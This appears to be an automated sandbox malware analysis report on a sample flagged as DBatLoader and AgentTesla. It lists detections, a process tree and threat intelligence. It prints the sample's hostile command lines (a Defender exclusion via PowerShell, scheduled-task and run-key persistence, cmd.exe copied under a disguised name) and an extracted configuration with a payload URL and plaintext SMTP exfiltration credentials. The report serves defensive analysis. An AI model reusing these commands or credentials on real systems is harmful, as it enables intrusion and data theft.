Edit tour

Windows Analysis Report
2jbMIxCFsK.exe

Overview

General Information

Sample name:	2jbMIxCFsK.exe renamed because original name is a hash value
Original sample name:	054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9.exe
Analysis ID:	1562866
MD5:	67dac6ae9ee770115db85cc71979dc41
SHA1:	a708539ebb312329f56f064a8491e4c6e1bd7ce8
SHA256:	054899796d592bb5f70b0a9fa28429024a919270a76603626be24068faae59d9
Tags:	doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected DBatLoader

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

2jbMIxCFsK.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\2jbMIxCFsK.exe" MD5: 67DAC6AE9EE770115DB85CC71979DC41)

cmd.exe (PID: 5396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 5968 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 6520 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 2472 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\2jbMIxCFsK.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lxsyrsiW.pif (PID: 320 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 3748 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 3652 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 892 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 1476 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 2928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6048 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

TrojanAIbot.exe (PID: 6208 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 2944 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)

lxsyrsiW.pif (PID: 6048 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 2164 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 320 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 1440 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 67DAC6AE9EE770115DB85CC71979DC41)

lxsyrsiW.pif (PID: 3652 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 5536 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Memory Dumps

Source	Rule	Description	Author
00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 2140	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 2140	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 2164	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2jbMIxCFsK.exe.2e60000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
9.0.neworigin.exe.240000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.neworigin.exe.240000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.0.neworigin.exe.240000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\2jbMIxCFsK.exe, ProcessId: 5468, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\2jbMIxCFsK.exe", ParentImage: C:\Users\user\Desktop\2jbMIxCFsK.exe, ParentProcessId: 5468, ParentProcessName: 2jbMIxCFsK.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 320, ProcessName: lxsyrsiW.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2jbMIxCFsK.exe, ProcessId: 5468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3652, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2jbMIxCFsK.exe, ProcessId: 5468, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\Desktop\2jbMIxCFsK.exe", ParentImage: C:\Users\user\Desktop\2jbMIxCFsK.exe, ParentProcessId: 5468, ParentProcessName: 2jbMIxCFsK.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 320, ProcessName: lxsyrsiW.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 3748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f, ProcessId: 892, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 2140, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 3748, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3652, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T08:13:00.554575+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	198.252.105.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2jbMIxCFsK.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Avira: detection malicious, Label: HEUR/AGEN.1325995

Found malware configuration

Source: 2jbMIxCFsK.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 9.0.neworigin.exe.240000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: 2jbMIxCFsK.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 2jbMIxCFsK.exe

Joe Sandbox ML: detected

Source: 2jbMIxCFsK.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
